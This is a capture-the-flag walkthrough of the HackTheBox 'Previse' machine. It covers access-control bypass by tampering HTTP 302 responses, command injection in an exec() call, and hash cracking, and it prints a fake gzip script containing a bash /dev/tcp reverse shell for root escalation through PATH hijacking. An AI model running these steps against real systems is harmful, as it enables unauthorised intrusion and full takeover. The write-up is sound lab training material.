CTF Challenges, HackTheBox

Previse HackTheBox Walkthrough

Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, hash cracking, privilege escalation by modifying script given root privileges in the sudoers file.

Table of Content

Network Scanning

  • Nmap

Enumeration

  • Directory enumeration using gobuster
  • Deriving bad coding practice from an old backup

Exploitation

  • Exploiting bad code to gain reverse shell

Privilege Escalation

  • Cracking hashes recovered from SQL database
  • Entry of access_backup.sh script found in sudoers which was running gzip
  • Creating gzip binary with custom code to escalate privileges to root

Let’s deep dive into this.

Network Scanning

The dedicated IP address of the machine is 10.129.95.185. We’ll run a nmap scan on this machine’s IP

nmap -A 10.129.95.185

Open ports are:

  • 22 running SSH
  • 80 running a website

Enumeration

A website was found. Upon inspecting some pages, it seemed like I had to be authenticated to access it.

Then we enumerated existing PHP pages on the website using gobuster

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --url http://10.129.95.185/ -x php

We found a page called nav.php which turned out to be a navigation page for the website. On the same page, we see a create account page.

After a little inspection of the create account page, we concluded that access protected all of the pages were and that a user had to log in. So, we tried HTTP response tampering to bypass access control. For that we intercepted the request in burp

Then we intercept it’s response too

As you can see, we found the page, but due to access restriction we can’t access it, and you can see a status code of 302.

So, we changed this 302 to 200 (status OK) and forwarded the response to our browser.

And now, the registration page was visible. We created an account using credentials raj:123123

Then we repeated the above steps. We want to bypass access restrictions on this page in order to successfully register our new user. For this, we will intercept the request again

And then we would again intercept this request’s response too.

We see a 302 status yet again due to access control

So, we change this status to 200 and forward it to our browser to render the page

Upon successful registration, we would see the congratulatory message.

Exploitation

We logged in using this account and could see a dashboard where various functions are possible. There were various file-related options.

On the files tab, we saw an interesting revelation. Seems like there was an entire website’s backup kept here.

Upon downloading and inspecting its contents, we saw various PHP files. Two interesting files caught our eye. First was config.php which had an SQL connection logic

We discovered the MySQL password from this file, while someone could exploit the coding logic flaw in the other file file_logs.php.

As we can see, the website is vulnerable to command injection as file_logs.php is hosting an unsanitized exec () function. The associated webpage presents a dropdown menu to choose value for the parameter “delim”

So, we intercept the request in burp suite and input our reverse shell payload for netcat as an additional argument for the exec () function that executes system commands.

At our listener we see that we have received a reverse shell. We convert this into a much more stable bash shell using python one liner

python3 -c “import pty;pty.spawn(‘/bin/bash’)”

Privilege Escalation

We checked in the local file system but nothing worthwhile was obtained. Then we remembered that we had obtained an SQL credential, so, we logged in to SQL and then dumped credentials for the user m4lwhere.

We cracked this using hashcat and obtained the password: ilovecody112235

hashcat -m 500 hash Desktop/rockyou.txt

We SSHed into this device using credentials obtained and checked the sudoers file. Then we observed that the user m4l could run the script access_backup.sh as root. Upon inspecting this script, we found out that gzip was using.

ssh m4lwhere@10.129.95.185
cat user.txt
sudo -l
cat /opt/scripts/access_backup.sh

So, we create an executable called gzip and input the bash one-liner reverse shell. After that, we gave it executable permissions, added the current directory in the PATH variable and run the script while setting a reverse shell listener.

nano gzip
#!/bin/bash
bash -I >& /dev/tcp/10.10.14.104/1234 0>&1
chmod +x gzip
export PATH=/home/m4lwhere:$PATH
sudo /opt/scripts/access_backup.sh

On the listener, we see a root shell had been obtained! We traverse to the home directory and read the congratulatory flag!

So, this is how we pwned the box! 

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. If you want to read more HTB Write-ups. Follow this Link. Happy Hacking!

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here